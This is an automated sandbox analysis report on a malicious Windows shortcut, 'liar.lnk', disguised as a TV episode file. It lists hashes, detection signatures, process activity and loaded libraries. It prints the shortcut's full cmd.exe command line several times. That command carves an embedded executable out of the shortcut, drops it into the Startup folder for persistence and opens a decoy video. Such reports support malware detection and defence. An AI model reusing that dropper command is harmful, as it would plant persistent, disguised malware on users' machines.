Edit tour

Windows Analysis Report
liar.lnk

Overview

General Information

Sample name:liar.lnk
Analysis ID:1624328
MD5:dda82d18bb435162cfa8d956b57e63bb
SHA1:93705e71ceddce5c380d5275c7648af7a76b7bcd
SHA256:456ddb67b8b717eeb5345cbeb1f3564e1bacfbdd9a683fe45d734ba0d0ca3b60
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
JA3 SSL client fingerprint seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Findstr Launching .lnk File
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • cmd.exe (PID: 6916 cmdline: "C:\Windows\System32\Cmd.exe" /v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD C:\Users\user\AppData\Local\Temp&Echo.>!I!&start !I! MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 744 cmdline: Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • Video.UI.exe (PID: 6968 cmdline: "C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca MD5: FE340ECB1D09B5BAA66DFE25AF11654F)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Trent Liffick: Data: Command: Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, CommandLine: Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\findstr.exe, NewProcessName: C:\Windows\System32\findstr.exe, OriginalFileName: C:\Windows\System32\findstr.exe, ParentCommandLine: "C:\Windows\System32\Cmd.exe" /v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD C:\Users\user\AppData\Local\Temp&Echo.>!I!&start !I!, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6916, ParentProcessName: cmd.exe, ProcessCommandLine: Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, ProcessId: 744, ProcessName: findstr.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: liar.lnkVirustotal: Detection: 24%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.1% probability
Source: unknownHTTPS traffic detected: 23.219.148.9:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /XBLWinClient/v10_video/configuration.xml HTTP/1.1Accept: */*User-Agent: XBLWIN10.19071Accept-Language: en-CHAccept-Encoding: gzip, deflate, brHost: settings-ssl.xboxlive.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: settings-ssl.xboxlive.com
Source: Video.UI.exe, 00000008.00000003.1392369675.000001D1E515B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
Source: Video.UI.exe, 00000008.00000003.1392369675.000001D1E515B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
Source: Video.UI.exe, 00000008.00000002.1494912670.000001D1D483E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema
Source: Video.UI.exe, 00000008.00000003.1392605393.000001D1E2D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
Source: Video.UI.exe, 00000008.00000002.1500766463.000001D1E1C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: Video.UI.exe, 00000008.00000002.1501939017.000001D1E1E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: Video.UI.exe, 00000008.00000002.1503100816.000001D1E2C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: Video.UI.exe, 00000008.00000002.1503100816.000001D1E2C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/P:
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localhttps://login.windows.local/
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.netate
Source: Video.UI.exe, 00000008.00000003.1483620858.000001D1E1CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://musicimage.xboxlive.comtBeforeRS2ent/v10_video/configuration.xml
Source: Video.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com
Source: Video.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com/
Source: Video.UI.exe, 00000008.00000002.1501235603.000001D1E1D75000.00000004.00000020.00020000.00000000.sdmp, Video.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmp, Video.UI.exe, 00000008.00000003.1483620858.000001D1E1CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com/XBLWinClient/v10_video/configuration.xml
Source: Video.UI.exe, 00000008.00000003.1483620858.000001D1E1CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com/XBLWinClient/v10_video/configuration.xmlAC
Source: Video.UI.exe, 00000008.00000002.1501752583.000001D1E1E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/DRM_IndividualizedVersion
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
Source: Video.UI.exe, 00000008.00000002.1503046462.000001D1E2C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
Source: Video.UI.exe, 00000008.00000003.1483620858.000001D1E1D4B000.00000004.00000020.00020000.00000000.sdmp, Video.UI.exe, 00000008.00000002.1501235603.000001D1E1D71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comB
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 23.219.148.9:443 -> 192.168.2.16:49750 version: TLS 1.2

System Summary

barindex
Source: liar.lnkLNK file: /v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="%Appdata%\Microsoft\Windows\Start Menu\Programs\startup\%USERNAME%.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD %TMP%&Echo.>!I!&start !I!
Source: classification engineClassification label: mal64.winLNK@8/20@1/1
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exeJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkvJump to behavior
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: liar.lnkVirustotal: Detection: 24%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\Cmd.exe" /v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD C:\Users\user\AppData\Local\Temp&Echo.>!I!&start !I!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk
Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe "C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.LnkJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: sharedui.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vccorlib140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msvcp140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: concrt140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: propsys.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rometadata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: esent.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: threadpoolwinrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: clipc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.system.profile.retailinfo.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.graphics.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.energy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.devices.enumeration.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wuceffects.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: userenv.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: profext.dllJump to behavior
